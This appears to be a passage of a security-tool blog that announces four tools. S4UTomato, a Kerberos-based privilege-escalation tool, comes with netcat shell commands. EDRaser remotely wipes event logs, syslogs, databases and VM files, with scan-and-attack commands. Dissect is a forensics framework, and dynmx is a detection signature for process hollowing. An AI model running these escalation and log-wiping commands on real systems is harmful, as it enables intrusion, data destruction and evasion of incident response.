request. To accomplish the aforementioned goal, I leveraged three techniques: <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (7)"><em>Resource-based Constrained Delegation</em></a>, <a href="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (8)"><em>Shadow Credentials</em></a>, and <a href="https://twitter.com/gentilkiwi/status/998219775485661184" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerber os (9)"><em>Tgtdeleg</em></a>. I built my project based on the <a href="https://github.com/GhostPack/Rubeus#tgtdeleg" rel="nofollow" target="_blank" title="Rubeus">Rubeus</a> toolset.</p> <h1 dir="auto" tabindex="-1">How to Use and Examples</h1> <div class="highlight highlight-source-batchfile notranslate position-relative overflow-auto" controller="" data-snippet-clipboard-copy-content="C:\Users\whoami\Desktop>S4UTomato.exe --help S4UTomato 1.0.0-beta Copyright (c) 2023 -d, --Domain Domain (FQDN) to authenticate to. -s, --Server Host name of <a title=" domain="" href="https://www.kitploit.com/search/label/Domain%20Controller">domain controller or LDAP server. -m, --ComputerName The new computer account to create. -p, --ComputerPassword The password of the new computer account to be created. -f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer object. -c, --Command Program to run. -v, --Verbose Output verbose debug information. --help Display this help screen. --version Display version information." dir="auto"><pre><code>C:\Users\whoami\Desktop>S4UTomato.exe --help<br /><br />S4UTomato 1.0.0-beta<br />Copyright (c) 2023<br /><br /> -d, --Domain Domain (FQDN) to authenticate to.<br /> -s, --Server Host name of domain controller or LDAP server.<br /> -m, --ComputerName The new computer account to create.<br /> -p, --ComputerPassword The password of the new computer account to be created.<br /> -f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer<br /> object.<br /> -c, --Command Program to run.<br /> -v, --Verbose Output verbose debug information.<br /> --help Display this help screen.<br /> --version Display version information.</code></pre></div> <h3 dir="auto" tabindex="-1">LEP via Resource-based Constrained Delegation</h3> <div><pre><code>S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"</code></pre></div> <p dir="auto" style="text-align: center;"><a href="https://github.com/wh0amitz/S4UTomato/blob/master/images/rbcd.gif" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (11)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj_w1RSjVvWIPM8gX7k6vlskrO4qoENFNWzsNAj5z5435D1ByisnhDyRzrTjc0UsRBtEve_VrA9KL7ILordzre2fUL8sAPUE2gH_VZ75jlTQEtU0Iw3m2LgF7p6VjFutZONF4PeQjl9LHXhdf0QSMzpb3aWspKunN2GFWAFb7wy8-iFHnBRS6u4nTe4xsdG"><img alt="" border="0" height="402" id="BLOGGER_PHOTO_ID_7276663114647162034" src="https://blogger.googleusercontent.com/img/a/AVvXsEj_w1RSjVvWIPM8gX7k6vlskrO4qoENFNWzsNAj5z5435D1ByisnhDyRzrTjc0UsRBtEve_VrA9KL7ILordzre2fUL8sAPUE2gH_VZ75jlTQEtU0Iw3m2LgF7p6VjFutZONF4PeQjl9LHXhdf0QSMzpb3aWspKunN2GFWAFb7wy8-iFHnBRS6u4nTe4xsdG=w640-h402" width="640" /></a></p> <h3 dir="auto" tabindex="-1">LEP via Shadow Credentials + S4U2self</h3> <div><pre><code>S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f</code></pre></div> <p dir="auto" style="text-align: center;"><a href="https://github.com/wh0amitz/S4UTomato/blob/master/images/shadowcred.gif" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (12)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiZOSMk2ScPioTG4sGY-D3XB2JTpb09h6cojWgsncObtUrJ8cKcCUqGYPpR_R25LEa5EDP9iC1U-Fr3ea8GX43w7LGr-w5a02AEAY59d83mN4KjvCDBSWaopFpGkqcEaYt7_3Rkjgf2UqNDRvh69LsG5iYuCJ-nvU60xZhuDrsbnaY_FWYZ_Hi3eH5yjAyb"><img alt="" border="0" height="402" id="BLOGGER_PHOTO_ID_7276663135301303442" src="https://blogger.googleusercontent.com/img/a/AVvXsEiZOSMk2ScPioTG4sGY-D3XB2JTpb09h6cojWgsncObtUrJ8cKcCUqGYPpR_R25LEa5EDP9iC1U-Fr3ea8GX43w7LGr-w5a02AEAY59d83mN4KjvCDBSWaopFpGkqcEaYt7_3Rkjgf2UqNDRvh69LsG5iYuCJ-nvU60xZhuDrsbnaY_FWYZ_Hi3eH5yjAyb=w640-h402" width="640" /></a></p> <h3 dir="auto" tabindex="-1">LEP via Tgtdeleg + S4U2self</h3> <div class="highlight highlight-source-batchfile notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="# First retrieve the TGT through Tgtdeleg S4UTomato.exe tgtdeleg # Then run SCMUACBypass to obtain SYSTEM privilege S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"" dir="auto"><pre><code># First retrieve the TGT through Tgtdeleg<br />S4UTomato.exe tgtdeleg<br /># Then run SCMUACBypass to obtain SYSTEM privilege<br />S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"</code></pre></div> <p dir="auto" style="text-align: center;"><a href="https://github.com/wh0amitz/S4UTomato/blob/master/images/tgtdeleg.gif" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (13)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg3HZLvI8PYEkmyEaXyXapvcUQPoGaht5SqfLRAl39IAiDQWWE5Ik6HliE8wT7LLCXXyqHYaKRe5g9Owp1GUVkv3ZTEidgSnrMyJBSFoDZfL3yog2x4mqnMzFq4u1hDbNolJkYVB5wEGEOdOt-H9pdZo_yitsWggET_4iE37OBmo7CWOKJvxGz7unQBz8Ev"><img alt="" border="0" height="402" id="BLOGGER_PHOTO_ID_7276663151477587410" src="https://blogger.googleusercontent.com/img/a/AVvXsEg3HZLvI8PYEkmyEaXyXapvcUQPoGaht5SqfLRAl39IAiDQWWE5Ik6HliE8wT7LLCXXyqHYaKRe5g9Owp1GUVkv3ZTEidgSnrMyJBSFoDZfL3yog2x4mqnMzFq4u1hDbNolJkYVB5wEGEOdOt-H9pdZo_yitsWggET_4iE37OBmo7CWOKJvxGz7unQBz8Ev=w640-h402" width="640" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/wh0amitz/S4UTomato" rel="nofollow" target="_blank" title="Download S4UTomato">Download S4UTomato</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-12682939146510661732023-10-05T08:30:00.006-03:002023-10-05T08:30:00.145-03:00Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZF_5oDRO9kh5fL8bdtP-5BaxB7Oec6uTmO25bsTlnUysYRsSuXtvxeevnNjRf19Ypudm1tqTV8IBA1IYIsw-ijpzSENIlrrq0Pye4GCEICjk_eECfeSHhOgOj-M-_s4xyWGW689o-_wRJAHIF0HcRJCed5mOx6CHtK9n0abbl6CCwmaOB1ccDj5pgTesH/s656/h144.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="656" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZF_5oDRO9kh5fL8bdtP-5BaxB7Oec6uTmO25bsTlnUysYRsSuXtvxeevnNjRf19Ypudm1tqTV8IBA1IYIsw-ijpzSENIlrrq0Pye4GCEICjk_eECfeSHhOgOj-M-_s4xyWGW689o-_wRJAHIF0HcRJCed5mOx6CHtK9n0abbl6CCwmaOB1ccDj5pgTesH/w640-h388/h144.png" width="640" /></a></div><div><br /></div> <p dir="auto">Dissect is a <a href="https://www.kitploit.com/search/label/Digital%20Forensics" target="_blank" title="digital forensics">digital forensics</a> & <a href="https://www.kitploit.com/search/label/Incident%20Response" target="_blank" title="incident response">incident response</a> framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).</p> <p dir="auto">This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see <a href="https://docs.dissect.tools/" rel="nofollow" target="_blank" title="the documentation">the documentation</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">What is Dissect?</h2> <p dir="auto">Dissect is an incident response framework build from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named <code>target-query</code> and <code>target-shell</code> to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!</p> <p dir="auto"><strong>Singular approach</strong></p> <p dir="auto">And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), <a href="https://www.kitploit.com/search/label/Filesystem" target="_blank" title="filesystem">filesystem</a> (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother <a href="https://www.kitploit.com/search/label/Extracting%20Files" target="_blank" title="extracting files">extracting files</a> from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.</p> <p dir="auto">If we take the example above, you can start analysing parsed MFT entries by just using a command like <code>target-query -f mft <PATH_TO_YOUR_IMAGE></code>!</p> <p dir="auto"><strong>Create a lightweight container using Acquire</strong></p> <p dir="auto">Dissect also provides you with a tool called <code>acquire</code>. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy <code>acquire</code> on a hypervisor to quickly create lightweight <a href="https://www.kitploit.com/search/label/Containers" target="_blank" title="containers">containers</a> of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like <code>target-query</code> and <code>target-shell</code>, but feel free to use other tools as well.</p> <p dir="auto"><strong>A modular setup</strong></p> <p dir="auto">Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!</p> <p dir="auto"><strong>Try it out now!</strong></p> <p dir="auto">Interested in trying it out for yourself? You can simply <code>pip install dissect</code> and start using the <code>target-*</code> tooling right away. Or you can use the interactive playground at <a href="https://try.dissect.tools" rel="nofollow" target="_blank" title="https://try.dissect.tools">https://try.dissect.tools</a> to try Dissect in your browser.</p> <p dir="auto">Don’t know where to start? Check out the <a href="https://docs.dissect.tools/en/latest/usage/introduction.html" rel="nofollow" target="_blank" title="introduction page">introduction page</a>.</p> <p dir="auto">Want to get a detailed overview? Check out the <a href="https://docs.dissect.tools/en/latest/overview/" rel="nofollow" target="_blank" title="overview page">overview page</a>.</p> <p dir="auto">Want to read everything? Check out the <a href="https://docs.dissect.tools" rel="nofollow" target="_blank" title="documentation">documentation</a>.</p> <h2 dir="auto" tabindex="-1">Projects</h2> <p dir="auto">Dissect currently consists of the following projects.</p> <ul dir="auto"> <li><a href="https://github.com/fox-it/dissect.cim" rel="nofollow" target="_blank" title="dissect.cim">dissect.cim</a></li> <li><a href="https://github.com/fox-it/dissect.clfs" rel="nofollow" target="_blank" title="dissect.clfs">dissect.clfs</a></li> <li><a href="https://github.com/fox-it/dissect.cstruct" rel="nofollow" target="_blank" title="dissect.cstruct">dissect.cstruct</a></li> <li><a href="https://github.com/fox-it/dissect.esedb" rel="nofollow" target="_blank" title="dissect.esedb">dissect.esedb</a></li> <li><a href="https://github.com/fox-it/dissect.etl" rel="nofollow" target="_blank" title="dissect.etl">dissect.etl</a></li> <li><a href="https://github.com/fox-it/dissect.eventlog" rel="nofollow" target="_blank" title="dissect.eventlog">dissect.eventlog</a></li> <li><a href="https://github.com/fox-it/dissect.evidence" rel="nofollow" target="_blank" title="dissect.evidence">dissect.evidence</a></li> <li><a href="https://github.com/fox-it/dissect.executable" rel="nofollow" target="_blank" title="dissect.executable">dissect.executable</a></li> <li><a href="https://github.com/fox-it/dissect.extfs" rel="nofollow" target="_blank" title="dissect.extfs">dissect.extfs</a></li> <li><a href="https://github.com/fox-it/dissect.fat" rel="nofollow" target="_blank" title="dissect.fat">dissect.fat</a></li> <li><a href="https://github.com/fox-it/dissect.ffs" rel="nofollow" target="_blank" title="dissect.ffs">dissect.ffs</a></li> <li><a href="https://github.com/fox-it/dissect.hypervisor" rel="nofollow" target="_blank" title="dissect.hypervisor">dissect.hypervisor</a></li> <li><a href="https://github.com/fox-it/dissect.ntfs" rel="nofollow" target="_blank" title="dissect.ntfs">dissect.ntfs</a></li> <li><a href="https://github.com/fox-it/dissect.ole" rel="nofollow" target="_blank" title="dissect.ole">dissect.ole</a></li> <li><a href="https://github.com/fox-it/dissect.regf" rel="nofollow" target="_blank" title="dissect.regf">dissect.regf</a></li> <li><a href="https://github.com/fox-it/dissect.sql" rel="nofollow" target="_blank" title="dissect.sql">dissect.sql</a></li> <li><a href="https://github.com/fox-it/dissect.squashfs" rel="nofollow" target="_blank" title="dissect.squashfs">dissect.squashfs</a></li> <li><a href="https://github.com/fox-it/dissect.target" rel="nofollow" target="_blank" title="dissect.target">dissect.target</a></li> <li><a href="https://github.com/fox-it/dissect.thumbcache" rel="nofollow" target="_blank" title="dissect.thumbcache">dissect.thumbcache</a></li> <li><a href="https://github.com/fox-it/dissect.util" rel="nofollow" target="_blank" title="dissect.util">dissect.util</a></li> <li><a href="https://github.com/fox-it/dissect.vmfs" rel="nofollow" target="_blank" title="dissect.vmfs">dissect.vmfs</a></li> <li><a href="https://github.com/fox-it/dissect.volume" rel="nofollow" target="_blank" title="dissect.volume">dissect.volume</a></li> <li><a href="https://github.com/fox-it/dissect.xfs" rel="nofollow" target="_blank" title="dissect.xfs">dissect.xfs</a></li> </ul> <h3 dir="auto" tabindex="-1">Related</h3> <p dir="auto">These projects are closely related to Dissect, but not installed by this meta package.</p> <ul dir="auto"> <li><a href="https://github.com/fox-it/acquire" rel="nofollow" target="_blank" title="acquire">acquire</a></li> <li><a href="https://github.com/fox-it/flow.record" rel="nofollow" target="_blank" title="flow.record">flow.record</a></li> </ul> <h2 dir="auto" tabindex="-1">Requirements</h2> <p dir="auto">This project is part of the Dissect framework and requires Python.</p> <p dir="auto">Information on the supported Python versions can be found in the Getting Started section of <a href="https://docs.dissect.tools/en/latest/index.html#getting-started" rel="nofollow" target="_blank" title="the documentation">the documentation</a>.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto"><code>dissect</code> is available on <a href="https://pypi.org/project/dissect/" rel="nofollow" target="_blank" title="PyPI">PyPI</a>.</p> <div><pre><code>pip install dissect</code></pre></div> <h2 dir="auto" tabindex="-1">Build and test instructions</h2> <p dir="auto">This project uses <code>tox</code> to build source and wheel distributions. Run the following command from the root folder to build these:</p> <div><pre><code>tox -e build</code></pre></div> <p dir="auto">The build artifacts can be found in the <code>dist/</code> directory.</p> <p dir="auto"><code>tox</code> is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:</p> <div><pre><code>tox</code></pre></div> <p dir="auto">For a more elaborate explanation on how to build and test the project, please see <a href="https://docs.dissect.tools/en/latest/contributing/tooling.html" rel="nofollow" target="_blank" title="the documentation">the documentation</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/fox-it/dissect" rel="nofollow" target="_blank" title="Download Dissect">Download Dissect</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-41404623226660087292023-09-24T08:30:00.018-03:002023-09-24T08:30:00.135-03:00EDRaser - Tool For Remotely Deleting Access Logs, Windows Event Logs, Databases, And Other Files<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFoaBoTxfltIJbJRhe4FpaYwyLfk51cNTbOaiUqcP67TJxzWbWNFpQZloNRelD7Nsq1-6ZLnmYqgTucqa60cUKj6UKP1h2sHdYSNRBUDF3rom-CeE9Wdu218kyOC_U_IHtmbMCUbUd815U_h3-OQF6g0x4U73qaFnpNSoiWs8un9vUrUUOdF9PR_nagyIb/s987/HTMLSmuggler.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="987" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFoaBoTxfltIJbJRhe4FpaYwyLfk51cNTbOaiUqcP67TJxzWbWNFpQZloNRelD7Nsq1-6ZLnmYqgTucqa60cUKj6UKP1h2sHdYSNRBUDF3rom-CeE9Wdu218kyOC_U_IHtmbMCUbUd815U_h3-OQF6g0x4U73qaFnpNSoiWs8un9vUrUUOdF9PR_nagyIb/w640-h332/HTMLSmuggler.png" width="640" /></a></div><p><br /></p> <p dir="auto">EDRaser is a powerful tool for remotely deleting access logs, Windows event logs, databases, and other files on remote machines. It offers two modes of operation: <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="automated">automated</a> and manual.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Automated Mode</h3> <p dir="auto">In automated mode, EDRaser scans the C class of a given address space of IPs for <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> systems and attacks them automatically. The attacks in auto mode are:</p> <ul dir="auto"> <li>Remote deletion of webserver logs.</li> <li>SysLog deletion (on Linux).</li> <li>Local deletion of Windows Application event logs.</li> <li>Remote deletion of Windows event logs.</li> <li>VMX + VMDK deletion</li> </ul> <p dir="auto">To use EDRaser in automated mode, follow these steps:</p> <div><pre><code>python edraser.py --auto<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Manual Mode</h3> <p dir="auto">In manual mode, you can select specific attacks to launch against a targeted system, giving you greater control. Note that some attacks, such as VMX deletion, are for local machine only.</p> <p dir="auto">To use EDRaser in manual mode, you can use the following syntax:</p> <div><pre><code>python edraser.py --ip <ip_addr> --attack <attack_name> [--sigfile <signature file>]<br /></code></pre></div> <p dir="auto">Arguments:</p> <ul dir="auto"> <li><code>--ip</code>: scan IP addresses in the specified range and attack vulnerable systems (default: localhost).</li> <li><code>--sigfile</code>: use the specified encrypted signature DB (default: signatures.db).</li> <li><code>--attack</code>: attack to be executed. The following attacks are available: ['vmx', 'vmdk', 'windows_security_event_log_remote', 'windows_application_event_log_local', 'syslog', 'access_logs', 'remote_db', 'local_db', 'remote_db_webserver']</li> </ul> <p dir="auto">Optional arguments:</p> <ul dir="auto"> <li><code>port</code> : port of remote machine</li> <li>``</li> <li><code>db_username</code>: the <a href="https://www.kitploit.com/search/label/Username" target="_blank" title="username">username</a> of the remote DB.</li> <li><code>db_password</code>: the password of the remote DB.</li> <li><code>db_type</code>: type of the DB, EDRaser supports <code>mysql</code>, <code>sqlite</code>. (# Note that for sqlite, no username\password is needed)</li> <li><code>db_name</code>: the name of remote DB to be connected to</li> <li><code>table_name</code>: the name of remote table to be connected to</li> <li><code>rpc_tools</code>: path to the VMware rpc_tools</li> </ul> <p dir="auto">Example:</p> <div><pre><code>python edraser.py --attack windows_event_log --ip 192.168.1.133 <br /><br />python EDRaser.py -attack remote_db -db_type mysql -db_username test_user -db_password test_password -ip 192.168.1.10<br /></code></pre></div> <h3 dir="auto" tabindex="-1">DB web server</h3> <p dir="auto">You can bring up a web interface for inserting and viewing a remote DB. it can be done by the following command: EDRaser.py -attack remote_db_webserver -db_type mysql -db_username test_user -db_password test_password -ip 192.168.1.10</p> <p dir="auto">This will bring up a web server on the localhost:8080 address, it will allow you to view & insert data to a remote given DB. This feature is designed to give an example of a "Real world" scenario where you have a website that you enter data into it and it keeps in inside a remote DB, You can use this feature to manually insert data into a remote DB.</p> <h3 dir="auto" tabindex="-1">Available Attacks</h3> <p dir="auto">In manual mode, EDRaser displays a list of available attacks. Here's a brief description of each attack:</p> <ol dir="auto"> <li>Windows Event Logs: Deletes Windows event logs from the remote targeted system.</li> <li>VMware Exploit: Deletes the VMX and VMDK files on the host machine. This attack works only on the <a href="https://www.kitploit.com/search/label/Localhost" target="_blank" title="localhost">localhost</a> machine in a VMware environment by modifying the VMX file or directly writing to the VMDK files.</li> <li>Web Server Logs: Deletes access logs from web servers running on the targeted system by sending a malicious string user-agent that is written to the access-log files.</li> <li>SysLogs: Deletes syslog from Linux machines running Kaspersky EDR without being .</li> <li>Database: Deletes all data from the remotely targeted database.</li> </ol> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SafeBreach-Labs/EDRaser" rel="nofollow" target="_blank" title="Download EDRaser">Download EDRaser</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-32084789295748655062023-09-22T08:30:00.001-03:002023-09-22T08:30:00.132-03:00Dynmx - Signature-based Detection Of Malware Features Based On Windows API Call Sequences<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe74bp8HxRLA3mXvp_kFa9TmaUirflK7-zZKAJ18LcQCKxgPHAuKzXGeA5VBoWHjSJesRqI2PXlUNA4UOr93Cee90nwmys_6z6xYL1pWNjOyw64JjF7nueNjITDhL2JgQesiIkwWvI7G7uzaxBeBnd7yhA2wcsmItOw2f_1z6sAprk0GTcEMVD6HEjkvYU/s866/dynmx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="866" height="540" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe74bp8HxRLA3mXvp_kFa9TmaUirflK7-zZKAJ18LcQCKxgPHAuKzXGeA5VBoWHjSJesRqI2PXlUNA4UOr93Cee90nwmys_6z6xYL1pWNjOyw64JjF7nueNjITDhL2JgQesiIkwWvI7G7uzaxBeBnd7yhA2wcsmItOw2f_1z6sAprk0GTcEMVD6HEjkvYU/w640-h540/dynmx.png" width="640" /></a></div><p><br /></p> <p dir="auto"><em>dynmx</em> (spoken <em>dynamics</em>) is a signature-based detection approach for behavioural malware features based on Windows API call sequences. In a simplified way, you can think of <em>dynmx</em> as a sort of YARA for API call traces (so called function logs) originating from malware sandboxes. Hence, the data basis for the detection approach are not the <a href="https://www.kitploit.com/search/label/Malware%20Samples" target="_blank" title="malware samples">malware samples</a> themselves which are analyzed statically but data that is generated during a <a href="https://www.kitploit.com/search/label/Dynamic%20Analysis" target="_blank" title="dynamic analysis">dynamic analysis</a> of the malware sample in a malware sandbox. Currently, <em>dynmx</em> supports function logs of the following malware sandboxes:</p> <ul dir="auto"> <li>VMRay (function log, text-based and XML format)</li> <li>CAPEv2 (<code>report.json</code> file)</li> <li>Cuckoo (<code>report.json</code> file)</li> </ul> <p dir="auto">The detection approach is described in detail in the master thesis <a href="https://github.com/0x534a/master-thesis" rel="nofollow" target="_blank" title="Signature-Based Detection of Behavioural Malware Features with Windows API Calls">Signature-Based Detection of Behavioural Malware Features with Windows API Calls</a>. This project is the prototype implementation of this approach and was developed in the course of the master thesis. The signatures are manually defined by malware analysts in the <em>dynmx</em> signature DSL and can be detected in function logs with the help of this tool. Features and syntax of the <em>dynmx</em> signature DSL can also be found in the master thesis. Furthermore, you can find sample dynmx signatures in the repository <a href="https://github.com/0x534a/dynmx-signatures" rel="nofollow" target="_blank" title="dynmx-signatures">dynmx-signatures</a>. In addition to detecting malware features based on API calls, dynmx can extract OS resources that are used by the malware (a so called Access Activity Model). These resources are extracted by examining the API calls and reconstructing operations on OS resources. Currently, OS resources of the categories filesystem, registry and network are considered in the model.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Example</h2> <p dir="auto">In the following section, examples are shown for the detection of malware features and for the extraction of resources.</p> <h3 dir="auto" tabindex="-1">Detection</h3> <p dir="auto">For this example, we choose the malware sample with the SHA-256 hash sum <code>c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3</code>. According to <a href="https://bazaar.abuse.ch/sample/c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3/" rel="nofollow" target="_blank" title="MalwareBazaar">MalwareBazaar</a>, the sample belongs to the malware family <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey" rel="nofollow" target="_blank" title="Amadey">Amadey</a>. There is a public <a href="https://www.vmray.com/analyses/_mb/c0832b1008aa/report/overview.html" rel="nofollow" target="_blank" title="VMRay analysis report">VMRay analysis report</a> of this sample available which also provides the <a href="https://www.vmray.com/analyses/_mb/c0832b1008aa/logs/flog.txt" rel="nofollow" target="_blank" title="function log">function log</a> traced by VMRay. This function log will be our data basis which we will use for the detection.</p> <p dir="auto">If we would like to know if the malware sample uses an injection technique called <a href="https://attack.mitre.org/techniques/T1055/012/" rel="nofollow" target="_blank" title="Process Hollowing">Process Hollowing</a>, we can try to detect the following <em>dynmx</em> signature in the function log.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="dynmx_signature: meta: name: process_hollow title: Process Hollowing description: Detection of Process hollowing malware feature detection: proc_hollow: # Create legit process in suspended mode - api_call: ["CreateProcess[AW]", "CreateProcessInternal[AW]"] with: - argument: "dwCreationFlags" operation: "flag is set" value: 0x4 - return_value: "return" operation: "is not" value: 0 store: - name: "hProcess" as: "proc_handle" - name: "hThread" as: "thread_handle" # Injection of malicious code into memory of previously created process - variant: - path: # Allocate memory with read, write, execute permission - api_call: ["VirtualAllocEx", "VirtualAlloc", "(Nt|Zw)AllocateVirtualMemory"] with: - argument: ["hProcess", "ProcessHandle"] operation: "is" value: "$(proc_handle)" - argument: ["flProtect", "Protect"] operation: "is" value: 0x40 - api_call: ["WriteProcessMemory"] with: - argument: "hProcess" operation: "is" value: "$(proc_handle)" - api_call: ["SetThreadContext", "(Nt|Zw)SetContextThread"] with: - argument: "hThread" operation: "is" value: "$(thread_handle)" - path: # Map memory section with read, write, execute permission - api_call: "(Nt|Zw)MapViewOfSection" with: - argument: "ProcessHandle" operation: "is" value: "$(proc_handle)" - argument: "AccessProtection" operation: "is" value: 0x40 # Resume thread to run injected malicious code - api_call: ["ResumeThread", "(Nt|Zw)ResumeThread"] with: - argument: ["hThread", "ThreadHandle"] operation: "is" value: "$(thread_handle)" condition: proc_hollow as sequence" dir="auto"><pre><code>dynmx_signature:<br /> meta:<br /> name: process_hollow<br /> title: Process Hollowing<br /> description: Detection of Process hollowing malware feature<br /> detection:<br /> proc_hollow:<br /> # Create legit process in suspended mode<br /> - api_call: ["CreateProcess[AW]", "CreateProcessInternal[AW]"]<br /> with:<br /> - argument: "dwCreationFlags"<br /> operation: "flag is set"<br /> value: 0x4<br /> - return_value: "return"<br /> operation: "is not"<br /> value: 0<br /> store:<br /> - name: "hProcess"<br /> as: "proc_handle"<br /> - name: "hThread"<br /> as: "thread_handle"<br /> # Injection of malicious code into memory of previously created process<br /> - variant:<br /> - path:<br /> # Allocate memory with read, write, execute permission<br /> - api_call: ["VirtualAllocE x", "VirtualAlloc", "(Nt|Zw)AllocateVirtualMemory"]<br /> with:<br /> - argument: ["hProcess", "ProcessHandle"]<br /> operation: "is"<br /> value: "$(proc_handle)"<br /> - argument: ["flProtect", "Protect"]<br /> operation: "is"<br /> value: 0x40<br /> - api_call: ["WriteProcessMemory"]<br /> with:<br /> - argument: "hProcess"<br /> operation: "is"<br /> value: "$(proc_handle)"<br /> - api_call: ["SetThreadContext", "(Nt|Zw)SetContextThread"]<br /> with:<br /> - argument: "hThread"<br /> operation: "is"<br /> value: "$(thread_handle)"<br /> - path:<br /> # Map memory section with read, write, execute permission<br /> - api_call: "(Nt|Zw)MapViewOfSection"<br /> with:<br /> - argument: "ProcessHandle"<br /> operation: "is"<br /> value: "$(proc_handle)"<br /> - argument: "AccessProtection"<br /> operation: "is"<br /> value: 0x40<br /> # Resume thread to run injected malicious code<br /> - api_call: ["ResumeThread", "(Nt|Zw)ResumeThread"]<br /> with:<br /> - argument: ["hThread", "ThreadHandle"]<br /> operation: "is"<br /> value: "$(thread_handle)"<br /> condition: proc_hollow as sequence</code></pre></div> <p dir="auto">Based on the signature, we can find some DSL features that make <em>dynmx</em> powerful:</p> <ul dir="auto"> <li>Definition of API call sequences with alternative paths</li> <li>Matching of API call function names with regular expressions</li> <li>Matching of argument and return values with several operators</li> <li>Storage of variables, e.g. in order to track handles in the API call sequence</li> <li>Definition of a detection condition with boolean operators (<code>AND</code>, <code>OR</code>, <code>NOT</code>)</li> </ul> <p dir="auto">If we run <em>dynmx</em> with the signature shown above against the function of the sample <code>c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3</code>, we get the following output indicating that the signature was detected.</p> <div><pre><code>$ python3 dynmx.py detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml<br /><br /><br /> |<br /> __| _ _ _ _ _<br /> / | | | / |/ | / |/ |/ | /\/<br /> \_/|_/ \_/|/ | |_/ | | |_/ /\_/<br /> /|<br /> \|<br /> <br /> Ver. 0.5 (PoC), by 0x534a<br /><br /><br />[+] Parsing 1 function log(s)<br />[+] Loaded 1 dynmx signature(s)<br />[+] Starting detection process with 1 worker(s). This probably takes some time...<br /><br />[+] Result<br />process_hollow c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt<br /></code></pre></div> <p dir="auto">We can get into more detail by setting the output format to <code>detail</code>. Now, we can see the exact API call sequence that was detected in the function log. Furthermore, we can see that the signature was detected in the process <code>51f0.exe</code>.</p> 